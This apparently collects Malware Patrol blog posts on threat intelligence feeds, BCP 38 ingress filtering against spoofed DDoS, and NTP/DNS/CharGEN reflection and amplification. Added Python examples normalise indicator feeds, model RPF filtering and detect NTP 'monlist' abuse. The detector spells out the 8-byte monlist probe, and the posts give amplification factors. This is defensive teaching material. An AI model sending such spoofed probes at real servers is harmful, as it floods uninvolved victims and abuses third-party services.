Microsoft observed a 254% increase in activity from a Linux trojan called XorDdos. First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its denial-of-service activity and its use of XOR-based encryption for its communications. Read more.

Vidar distributed through backdoored Windows 11 downloads and abusing Telegram

Source: zscaler

In April 2022, ThreatLabz discovered several newly registered domains, which were created by a threat actor to spoof the official Microsoft Windows 11 OS download portal. Read more.


]]>
Threat Intelligence: Essential For Your Cyber Defenses https://www.malwarepatrol.net/threat-intelligence-for-cyber-risk/ Thu, 09 Jan 2020 22:41:13 +0000 https://www.malwarepatrol.net/?p=35695 The post Threat Intelligence: Essential For Your Cyber Defenses appeared first on Malware Patrol.


Cyber risk is growing while confidence in the resilience of internal defenses is declining. According to the Marsh and Microsoft 2019 Global Cyber Risk Perception Survey, cyber security is a top-five business concern for 79% of companies globally (and the top risk for 22% of those surveyed).

Threat intelligence (TI) is a critical component of your cybersecurity program: the defenses that mitigate cyber risk and help avoid potentially damaging incidents. For smaller businesses, this may be managed by an MSSP, but for larger enterprises, custom TI and in-house management of it are a must.

What is threat intelligence?

Threat intelligence is, at its core, a collection of tagged and enriched data that identifies potential threats such as malware, ransomware, phishing campaigns, botnets and cryptominers. These are stored, monitored and contextually enriched with relevant data such as IP addresses, URLs, the system vulnerabilities targeted, the implications of an attack, and patterns of behaviour.

Armed with this information, your organization is able to detect incoming threats, set up alerting and blocking, and engage in threat hunting. With a well-designed solution, TI is integrated with automated processes and machine learning, so analysts spend less time on manual configuration and more time on advanced analysis of incoming data and on identifying new, undocumented threats. Data from external sources must integrate seamlessly into your security platforms and tools: if you can’t consume it in an automated fashion, it is unlikely to help your efforts much.

In The Evolution of Cyber Threat Intelligence (CTI): 2019 SANS CTI Survey, 81% of respondents indicated that CTI had improved their security and response.

Why do organizations need threat intelligence?

Every day new threats are released into the wild. Some are obvious and simple to defeat, perhaps the ‘spray and pray’ type aimed at personal data and systems, which current organizational firewalls and network security mechanisms detect easily. Others pose serious threats to organizational systems and data, and may directly target a particular industry or, worse still, your business itself.

Your organization needs real-time, accurate TI to give it the best chance at deflecting attacks.

Threat intelligence can help:

● Identify new threats targeting your business or industry

● Engage in threat hunting activities

● Decrease incident response time

● Prevent access to malicious resources on the Internet

● Avoid penalties and reputational losses from data exfiltration and breaches

● Identify system vulnerabilities

● Identify compromised systems

● Reduce unplanned down times

What do organizations do with threat intelligence?

TI is highly useful for cyber incident response. As per the SANS Incident Handler’s Handbook, this process involves preparation, identification, containment, eradication, recovery, and lessons learned.

TI is used most heavily at the identification and containment stages: incoming threats are identified, prioritized according to the level of threat determined, then contained as necessary. Threats that do slip through can be shared with the wider community during lessons learned to keep everyone’s business healthy.

A well-functioning TIP / SIEM / SOAR stack and a capable security team are both essential to ensuring threat intelligence is useful, timely, and actually prevents incidents. On its own, TI is just one part of the process and is only as useful as the infrastructure supporting it. It should integrate easily into your current SIEM and/or other platforms, saving your security professionals the time of building scripts to ingest data feeds.

Threat intelligence types and streams

The SANS survey identifies four main types of threat intelligence:

● Indicators of Compromise a.k.a. IOCs (e.g. URLs, command & control centers, IP addresses, newly registered domains, etc)

● Threat behaviors, tactics, and procedures

● Digital footprint

● Strategic analysis of adversary

There are also a number of streams through which we can gather TI:

● Feeds from threat intelligence vendors

● Internally gathered information

● Community group feeds (ISACs, for example)

● Free feeds from security vendors

● Media reports

● Open source (or non-commercial) feeds

While everyone loves a freebie, open source and free feeds usually aren’t the best route. The information they provide may be outdated or duplicated, and often needs filtering and reformatting before it is usable. Threat intelligence vendors such as Malware Patrol continuously process threat data drawn from internal and external sources to ensure it is up-to-date, vetted, well-formatted, contextualized and enriched before releasing it to customers.
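The filtering, deduplication and reformatting that raw feeds need, shown as an added example rather than Malware Patrol’s own code. The two feeds are constructed stand-ins for a timestamped CSV feed and a bare, undated list; the record fields (type, value, last_seen) and the 30-day freshness window are assumptions, not any vendor’s schema:

```python
"""Turning raw indicator feed lines into deduplicated, typed, age-checked records.

Added example, not Malware Patrol code. The two feeds below are constructed stand-ins
for "a timestamped CSV feed" and "a bare list with no dates"; the record field names
(type, value, last_seen) are assumptions, not any vendor's schema.
"""
import ipaddress
import re
from datetime import datetime, timedelta, timezone

# Constructed feed A: indicator,last_seen (UTC). Note the duplicate IP and the old domain.
FEED_A = """\
# indicator,last_seen
198.51.100.23,2019-12-30T10:00:00Z
malicious.example,2019-11-01T08:30:00Z
http://malicious.example/payload.exe,2020-01-05T12:00:00Z
198.51.100.23,2020-01-06T09:15:00Z
"""

# Constructed feed B: bare values, no dates, inconsistent casing, one line of junk.
FEED_B = """\
198.51.100.23
MALICIOUS.EXAMPLE
0123456789ABCDEF0123456789ABCDEF
not an indicator
"""

_MD5 = re.compile(r"^[0-9a-f]{32}$", re.I)
_SHA256 = re.compile(r"^[0-9a-f]{64}$", re.I)
_DOMAIN = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9-]{1,63}\.)+[a-z]{2,63}$", re.I)


def classify(value: str):
    """Indicator type by syntax: sha256, md5, ip, url, domain, or None if unrecognised."""
    if _SHA256.match(value):
        return "sha256"
    if _MD5.match(value):
        return "md5"
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        pass
    if value.lower().startswith(("http://", "https://")):
        return "url"
    if _DOMAIN.match(value):
        return "domain"
    return None


def parse_feed(text: str, has_timestamp: bool):
    """Yield (value, last_seen or None) from one feed; comments and blank lines are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if has_timestamp:
            value, ts = (part.strip() for part in line.split(",", 1))
            seen = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        else:
            value, seen = line, None
        yield value, seen


def normalize(entries, now: datetime, max_age_days: int = 30):
    """Classify, canonicalise, drop stale or unparseable entries, and merge duplicates.

    Duplicates are keyed on (type, canonical value); the newest last_seen wins.
    Undated entries are kept with last_seen=None so the consumer can weight them lower.
    """
    kept, rejected = {}, []
    for value, seen in entries:
        kind = classify(value)
        if kind is None:
            rejected.append(value)          # junk line: not an indicator at all
            continue
        if seen is not None and now - seen > timedelta(days=max_age_days):
            rejected.append(value)          # dated and too old for the freshness window
            continue
        canonical = value if kind == "url" else value.lower()
        key = (kind, canonical)
        prev = kept.get(key)
        if prev is None or (seen is not None and (prev["last_seen"] is None or seen > prev["last_seen"])):
            kept[key] = {"type": kind, "value": canonical, "last_seen": seen}
    return list(kept.values()), rejected


def build_indicators(now: datetime):
    """Merge both constructed feeds as of `now`."""
    entries = list(parse_feed(FEED_A, True)) + list(parse_feed(FEED_B, False))
    return normalize(entries, now)


if __name__ == "__main__":
    now = datetime(2020, 1, 9, tzinfo=timezone.utc)  # this post's publication date
    indicators, rejected = build_indicators(now)
    for rec in indicators:
        print(rec)
    print("rejected (stale or unparseable):", rejected)
```

Run as of 9 January 2020 the stale domain entry from feed A is rejected, the two dated copies of the IP collapse into one record carrying the newer timestamp, and the junk line is discarded. Note the trap the undated feed creates: the same domain reappears in feed B without a date, so it comes back as a record with last_seen=None. That is exactly why undated free feeds deserve lower confidence, or a policy of dropping undated entries entirely.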

Malware Patrol has been collecting threat data for over 15 years. Contact us to request a free evaluation of our services and to learn how our feeds and packages can be tailored to your business requirements.

Andre Correa

CEO, Malware Patrol


Spoofed DDoS Attacks and BCP 38 https://www.malwarepatrol.net/spoofed-ddos-attacks-and-bcp-38/ Tue, 12 Jul 2016 12:39:55 +0000 https://www.malwarepatrol.net/?p=25953 The post Spoofed DDoS Attacks and BCP 38 appeared first on Malware Patrol.


The majority of recent DDoS attacks utilize source address spoofing. These spoofed DDoS attacks complicate mitigation efforts and hide the IP address of the originating system. This happens with TCP SYN floods as well as with UDP amplification and reflection attacks. This post was created to raise awareness of the existence of best practices to prevent address spoofing. Administrators of networks connected to the Internet are urged to implement ingress filtering according to BCP 38 and RFC 3704 to prevent the abuse of internal devices to generate spoofed packets.

DDoS attacks, as the name suggests, originate from multiple devices distributed around the Internet. Packets traversing IP networks contain a header with source and destination addresses. In spoofed DDoS attacks, the source address is deliberately set to something other than the address of the originating device. The receiving party is fooled into believing that replies must be sent to the spoofed address, and the real address of the attacker cannot be recovered from the packets themselves.

Network administrators must enforce policies to only allow packets with legitimate source addresses to enter the Internet. This rule applies to ingress (input) traffic to border routers. Restrictions should enforce that only traffic originating from addresses assigned to the network or networks directly connected to border router interfaces is forwarded.

For example, suppose ISP A (Internet Service Provider) runs router R1 connected to the Internet on its interface f0/0 and customer X is connected to interface f1/0 with an assigned IP address range x.y.z.0/24. Traffic originating from customer X is ingress to router R1 and only packets arriving at interface f1/0 with source addresses in the range x.y.z.0/24 should be forwarded. Packets containing any other source address should be dropped on that interface, not forwarded.

It is important to drop such packets silently rather than reject them with an ICMP error, which would generate additional traffic from the router back toward the originating network segment.

RFCs and BCPs are formal documents published by the IETF (Internet Engineering Task Force). The acronym RFC means Request For Comments. These documents describe specifications, protocols, procedures and events, and are the result of committee drafting and subsequent review by interested parties. Each RFC carries a status: standards track, informational, experimental, best current practice, historic or unknown. Standards-track RFCs can become Internet Standards, and a published RFC is never edited in place; changes are made only by issuing a new document that updates or obsoletes the previous one. RFCs with the status best current practice are referred to as BCPs.

The first RFC was published on April 7, 1969 by Steve Crocker to archive notes related to the development of ARPANET.

RFC 1 – Host Software http://tools.ietf.org/html/rfc1.html

BCP documents receive two numbers, one as an RFC and another as a Best Current Practice. For example, BCP 38 is also RFC 2827. BCPs describe guidelines, processes, methods and other subjects not suitable for a standard. As of this writing, the latest BCP is 205, from July 2016.

BCP 38 has become a critical tool to help mitigate DDoS attacks. Implementing it means your devices won’t participate in attacks that employ source address spoofing. Notice that BCP 38 doesn’t protect against floods originating from valid source IP addresses, nor does it shield you from spoofed traffic generated in networks that haven’t implemented it; it prevents your network from being the origin of such traffic.

All providers of Internet connectivity, whether or not they operate an AS (Autonomous System), are strongly urged to implement ingress filtering mechanisms according to BCP 38 and RFC 3704 to prevent attackers from using forged source addresses.

Unfortunately, this is still not implemented in many networks, even though the best practices have been known for a long time: the first RFC published on this subject was 2267 in January 1998, followed by 2827 (BCP 38) in May 2000 and 3704 (BCP 84) in March 2004.

RFC 2267 – Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing http://tools.ietf.org/html/rfc2267.html

RFC 2827 / BCP 38 – Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing http://tools.ietf.org/html/rfc2827.html

RFC 3704 / BCP 84 – Ingress Filtering for Multihomed Networks http://tools.ietf.org/html/rfc3704.html

There are distinct methods to implement ingress filtering in a network. The choice must be based on the topology and the advantages and disadvantages of each deployment option.

    • Ingress access lists: the most common method. The source address of every packet is compared against a list of acceptable prefixes for the interface it arrived on. Its main disadvantages are manual maintenance and list size, which may become large depending on the environment.

    • Strict Reverse Path Forwarding (Strict RPF): conceptually similar to access lists, but dynamic: a packet is accepted only if the best route back to its source address points out the interface it arrived on. It is a simple and fast option for edge routers that receive BGP prefixes from customers. It brings some challenges on networks that employ asymmetric routing or are multi-homed, which may require BGP communities to influence path selection so that the reverse path matches the arriving interface.

    • Feasible Path Reverse Path Forwarding (Feasible RPF): an extension of Strict RPF that solves some of the problems experienced on asymmetric or multi-homed networks. Alternative routes that lost the best-path selection are also kept for the check, so a packet is accepted if any feasible route to its source points out the arriving interface. In simple terms, if the advertisement of a prefix is filtered, packets from that prefix will be filtered as well.

    • Loose Reverse Path Forwarding (Loose RPF): relies only on the presence of a route, including the default route, to decide whether packets are forwarded or dropped; it doesn’t take into account where the route points. It is in fact a route existence check, so it accepts spoofed addresses that belong to any routable prefix, but it avoids the drops that Strict RPF can cause on asymmetric routing environments.

    • Loose Reverse Path Forwarding Ignoring Default Routes: an explicit route check that excludes the default route. It is useful when specific routes are created to cover all legitimate traffic and the default route exists only to catch bogus traffic.
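The five filtering methods above, and the ISP A / router R1 / customer X example earlier in the post, side by side as an added example (not code from the original post). The topology is the post’s own scenario with documentation prefixes standing in for x.y.z.0/24, plus a constructed dual-homed customer Y on f2/0 and f3/0 to show the asymmetric-routing case; the routing table, ACLs and interface names are assumptions:

```python
"""Ingress-filtering decision models from RFC 3704 / BCP 84.

Added example, not code from the original post. Topology: ISP A's router R1 with
f0/0 toward the Internet, customer X on f1/0 (203.0.113.0/24 stands in for the
post's x.y.z.0/24) and a constructed dual-homed customer Y on f2/0 (primary) and
f3/0 (backup). All routes, ACLs and interface names are assumptions.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Route:
    prefix: ipaddress.IPv4Network
    iface: str
    best: bool = True  # False marks an alternative path that lost best-path selection


def net(s):
    return ipaddress.ip_network(s)


# Constructed routing table of R1.
ROUTES = [
    Route(net("0.0.0.0/0"), "f0/0"),                 # default route toward the Internet
    Route(net("198.51.100.0/24"), "f0/0"),           # a remote network learned from upstream
    Route(net("203.0.113.0/24"), "f1/0"),            # customer X, the post's x.y.z.0/24
    Route(net("192.0.2.0/24"), "f2/0"),              # customer Y, primary link (best path)
    Route(net("192.0.2.0/24"), "f3/0", best=False),  # customer Y, backup link (feasible path)
]

# Constructed per-interface ingress ACL: prefixes allowed as source on each customer port.
ACL = {
    "f1/0": [net("203.0.113.0/24")],
    "f2/0": [net("192.0.2.0/24")],
    "f3/0": [net("192.0.2.0/24")],
}


def _longest_match(routes, src):
    """All routes covering src at the longest matching prefix length."""
    hits = [r for r in routes if src in r.prefix]
    if not hits:
        return []
    longest = max(r.prefix.prefixlen for r in hits)
    return [r for r in hits if r.prefix.prefixlen == longest]


def ingress_acl(acl, iface, src):
    """Static list: accept only sources explicitly allowed on this interface."""
    return any(src in p for p in acl.get(iface, ()))


def strict_rpf(routes, iface, src):
    """Strict RPF: the best route back to src must point out the arriving interface."""
    return any(r.best and r.iface == iface for r in _longest_match(routes, src))


def feasible_rpf(routes, iface, src):
    """Feasible-path RPF: any route to src (best or alternative) via the arriving interface."""
    return any(r.iface == iface for r in _longest_match(routes, src))


def loose_rpf(routes, src, ignore_default=False):
    """Loose RPF: a route to src merely has to exist; optionally the default route is ignored."""
    return any(
        src in r.prefix
        for r in routes
        if not (ignore_default and r.prefix.prefixlen == 0)
    )


METHODS = ("acl", "strict", "feasible", "loose", "loose-nodefault")


def decide(method, iface, src_str):
    """Return 'forward' or 'drop' for a packet with source src_str arriving on iface."""
    src = ipaddress.ip_address(src_str)
    checks = {
        "acl": lambda: ingress_acl(ACL, iface, src),
        "strict": lambda: strict_rpf(ROUTES, iface, src),
        "feasible": lambda: feasible_rpf(ROUTES, iface, src),
        "loose": lambda: loose_rpf(ROUTES, src),
        "loose-nodefault": lambda: loose_rpf(ROUTES, src, ignore_default=True),
    }
    return "forward" if checks[method]() else "drop"


# Constructed packets: (arriving interface, source address, what it represents)
PACKETS = [
    ("f1/0", "203.0.113.10", "legitimate customer X host"),
    ("f1/0", "198.51.100.5", "spoofed: a routable address belonging to someone else"),
    ("f1/0", "10.1.2.3", "spoofed: bogon, no specific route"),
    ("f3/0", "192.0.2.7", "customer Y arriving over its backup link (asymmetric)"),
]

if __name__ == "__main__":
    for iface, src, what in PACKETS:
        verdicts = ", ".join(f"{m}={decide(m, iface, src)}" for m in METHODS)
        print(f"{src:>14} on {iface}: {verdicts}   # {what}")
```

The output makes the trade-offs concrete: the ACL and Strict RPF drop both spoofed packets but Strict RPF also drops customer Y’s legitimate traffic on the backup link, Feasible RPF accepts that traffic while still dropping the spoofs, and Loose RPF lets the spoofed routable address through (only ignoring the default route catches the bogon). On real equipment the same checks are one line each, for example `ip verify unicast source reachable-via rx` (strict) or `reachable-via any` (loose) on a Cisco IOS interface, and `net.ipv4.conf.all.rp_filter=1` (strict) or `=2` (loose) on Linux.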

The following additional scenarios must be taken into account when implementing BCP 38 or mitigating DDoS attacks:

    • Spoofed source addresses don’t have to belong to reserved or private ranges such as 10.0.0.0/8 or 192.168.0.0/16. In fact, attackers most frequently randomize source addresses, using prefixes assigned to geographically distributed networks and even the few ranges still not assigned to any organization, so filtering bogons alone is not enough.

      During a SYN flood, the targeted system sends SYN-ACK replies to what it believes to be the originating systems in an attempt to complete the TCP three-way handshake. Because the source addresses are spoofed, uninvolved systems receive this unwanted backscatter traffic. Under certain circumstances, this may result in a secondary denial of service.

    • A situation that is not commonly taken into account during the mitigation of DDoS attacks is an attacker spoofing a particular network or networks, creating for example a SYN flood. The administrator of the targeted infrastructure calls its network provider, ISP X, and they decide to filter all traffic coming from the impersonated networks. The consequence is that users of the non-hostile spoofed networks are denied access to all networks connected to ISP X, resulting in an unintentional denial of service. This shows how sensitive the task of blocking traffic originating from the Internet is when it is done without an appropriate assessment.

    • Network operators should log information on dropped packets to monitor suspicious activity.

    • If IPsec AH (Authentication Header) is not in use, spoofing IPv6 source addresses is as simple as in IPv4 [3], and the IPv6 specification only makes IPsec support optional in practice, so ingress filtering is just as necessary for IPv6. Source routing would be another option for attackers, but IPv6 Routing Header Type 0 has been deprecated (RFC 5095) and the IPv4 source-route options are disabled by default on most routers.

References:

[1] BCP38 – http://www.bcp38.info/

[2] DoS SYN flood attack – http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/100830-asa-pix-netattacks.html

[3] IPv6 security brief – http://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/enterprise-ipv6-solution/white_paper_c11-678658.html

[4] Ingress Filtering for Multihomed Networks – http://tools.ietf.org/pdf/rfc3704.pdf
 
 

Protect Your Business

Malware Patrol offers a wide variety of threat intelligence feeds for use within organizations of all sizes and industries, including a real-time feed of amplification and reflection DDoS attacks that have happened in the last 24 hours. We verify our feeds constantly – every hour in most cases – to ensure they contain only actionable indicators that protect our customers against malware infections and data breaches.

For ease of use, we format the feeds for compatibility with the most popular security tools and platforms. To learn more or to request a free evaluation, you can contact us and our cybersecurity experts will get in touch with you.

Andre Correa

Co-Founder, Malware Patrol

Information Security and Threat Intelligence Professional whose qualifications include in-depth knowledge of Internet technologies, the current cyber security landscape, incident response, security mechanisms and best practices. He founded the Malware Patrol project in 2005. The company helps enterprises around the world protect themselves from malware and ransomware attacks through some of the most comprehensive threat data feeds and block lists on the market.


DDoS: What is a Reflection and Amplification Attack? https://www.malwarepatrol.net/ddos-reflection-and-amplification-attacks/ Mon, 04 Jul 2016 18:12:47 +0000 https://www.malwarepatrol.net/?p=25964 The post DDoS: What is a Reflection and Amplification Attack? appeared first on Malware Patrol.

Updated on 06/13/2022

DDoS – What is it?

A distributed denial-of-service (DDoS) attack is a type of cyber attack in which a malicious actor seeks to disrupt normal traffic of a targeted server, service, or network by overwhelming it with traffic.

Brand reputation, time, clients and money can all be at risk in a DDoS attack. Depending on the severity, resources could be offline for hours, days or even longer.

 

DDoS – Reflection and Amplification

Reflection and amplification are mechanisms commonly used in DDoS attacks. These simple and very effective techniques gained popularity around 2013. They take advantage of publicly accessible UDP services to overload victims with response traffic. Attackers usually do not have to abuse old versions of protocols or exploit vulnerabilities; instead, legitimate requests are used.

Reflection occurs when an attacker forges the source address of request packets, pretending to be the victim. Because UDP has no handshake, servers cannot distinguish legitimate from spoofed requests and reply directly to the victim. This technique hides the real IP address of the attacker from both the victim’s system and the abused server.

The other mechanism is traffic amplification. The attacker’s goal is to make the abused service produce as much response data as possible. The ratio between the response and request sizes is called amplification factor. The attacker wants to achieve the largest possible ratio. For example, if an open CharGEN service is used to flood a victim, an amplification factor of up to 359 times can be observed. (Notice that, although CharGEN is not expected to be used these days and should never be openly exposed to the Internet, this is a legitimate service and no vulnerabilities need to be exploited to produce attacks.)

When these techniques are repeatedly used together, an attack is generated. Servers in multiple locations can be involved to produce more devastating results. It is important to realize that abused services are victims as well as those targeted by reply floods. These servers suddenly have to deal with abnormally large amounts of spoofed requests that may prevent them from serving legitimate traffic.

Many UDP protocols can be abused. Among the most common are: NTP with an amplification factor of 557 times, CharGEN with a factor of 359 times, DNS with a factor from 28 to 54 times, and SSDP with a factor of 31 times [1].

Abusing NTP requires that an old feature of ntpd, the reference implementation, be enabled: the mode 7 ‘monlist’ debug command. The attacker sends it with the victim’s address as the source, and the server replies with statistics about the clients it has recently seen, such as IP address, NTP version, and the number of requests made to the server. Using this command requires neither authentication nor authorization. The response is sent in up to 100 UDP datagrams with a 440-byte payload each, for a table of up to 600 entries in ntpd, so a single small request can trigger close to 50 KB of data directed at the victim. The amplification factor of ‘monlist’ therefore depends directly on the number of client entries the server holds, but is always very high. The command was removed from ntpd in version 4.2.7p26; on older versions it can be turned off with ‘disable monitor’ or by restricting queries with the ‘noquery’ option. ‘monlist’ is not the only command with a significant amplification factor; others can be abused as well to produce attacks.
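What a reflected ‘monlist’ request looks like on the wire, and how the abused server (or a sensor in front of it) can spot that it is being used as a reflector, as an added example that is not part of the original post. The header layout and request codes come from ntpd’s mode 7 (private) protocol; the datagrams and addresses are constructed, with 192.0.2.10 playing the spoofed victim:

```python
"""Spotting NTP mode 7 'monlist' requests, the ntpd debug command abused for reflection.

Added example, not code from the original post. The datagrams below are constructed;
the source addresses are documentation ranges, and 192.0.2.10 plays the spoofed victim.
"""
from collections import Counter

# From ntpd's ntp_request.h: implementation id of the reference daemon and the two
# request codes that return the "monitor list" of recent clients.
IMPL_XNTPD = 3
REQ_MON_GETLIST = 20
REQ_MON_GETLIST_1 = 42
MONLIST_CODES = {REQ_MON_GETLIST, REQ_MON_GETLIST_1}


def parse_mode7(payload: bytes):
    """Decode the 8-byte NTP mode 7 (private) header; return None for anything else.

    Byte 1: R (response) bit, M (more) bit, 3-bit version, 3-bit mode.
    Byte 2: authenticated bit + sequence number. Byte 3: implementation. Byte 4: request code.
    """
    if len(payload) < 8:
        return None
    first = payload[0]
    if first & 0x07 != 7:          # not a private-mode packet (e.g. a mode 3 client poll)
        return None
    return {
        "response": bool(first & 0x80),
        "more": bool(first & 0x40),
        "version": (first >> 3) & 0x07,
        "implementation": payload[2],
        "request_code": payload[3],
    }


def is_monlist_request(payload: bytes) -> bool:
    """True for an ntpd 'monlist' query: mode 7 request, implementation 3, code 20 or 42."""
    hdr = parse_mode7(payload)
    return (
        hdr is not None
        and not hdr["response"]
        and hdr["implementation"] == IMPL_XNTPD
        and hdr["request_code"] in MONLIST_CODES
    )


def monlist_abuse_report(datagrams, threshold=10):
    """Count monlist requests per claimed source address.

    Sources at or above the threshold are the likely spoofed victims: nobody legitimately
    asks one server for its monitor list that often, so the server is being used as a reflector.
    """
    counts = Counter(src for src, payload in datagrams if is_monlist_request(payload))
    return {src: n for src, n in counts.items() if n >= threshold}


# Constructed payloads (hex). 0x17 = version 2, mode 7, R/M bits clear.
MONLIST_PROBE = bytes.fromhex("1700032a" + "00" * 4)     # the well-known 8-byte monlist probe (code 42)
MONLIST_PROBE_V1 = bytes.fromhex("17000314" + "00" * 4)  # the same request via code 20
MONLIST_REPLY = bytes.fromhex("9700032a" + "00" * 4)     # R bit set: a reply, not a request
NORMAL_CLIENT = bytes.fromhex("1b" + "00" * 47)          # ordinary 48-byte mode 3 client poll

# Constructed traffic as the NTP server sees it: (claimed source IP, UDP payload)
SAMPLE_DATAGRAMS = (
    [("192.0.2.10", MONLIST_PROBE)] * 40        # victim's address spoofed by the attacker
    + [("192.0.2.10", MONLIST_PROBE_V1)] * 5
    + [("198.51.100.7", NORMAL_CLIENT)] * 30    # a real time client
    + [("198.51.100.8", MONLIST_PROBE)] * 2     # a lone scanner, below threshold
    + [("203.0.113.4", MONLIST_REPLY)]          # a stray reply seen on the wire
)

if __name__ == "__main__":
    for src, n in monlist_abuse_report(SAMPLE_DATAGRAMS).items():
        print(f"{src}: {n} monlist requests -> likely reflection victim; this server is being abused")
```

Every flagged source here is a victim, not an attacker, which is why blocking it would only finish the attacker’s job; the fix is on the server side. Check your own servers with `ntpdc -n -c monlist <server>` from outside; if the command returns data, upgrade ntpd past 4.2.7p26 or add `disable monitor` and a `restrict default kod nomodify notrap nopeer noquery` line to ntp.conf.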

There are millions of services on the Internet that attackers can abuse, but all of them can be secured to avoid participating in DDoS attacks. Some can be shut down completely, others should be put behind a firewall to prevent external access, while some require reconfiguration or upgrades to provide proper security mechanisms.

All companies running UDP services exposed to the Internet are urged to properly implement security measures to prevent them from being used in DDoS attacks.

 

Andre Correa

Co-Founder, Malware Patrol


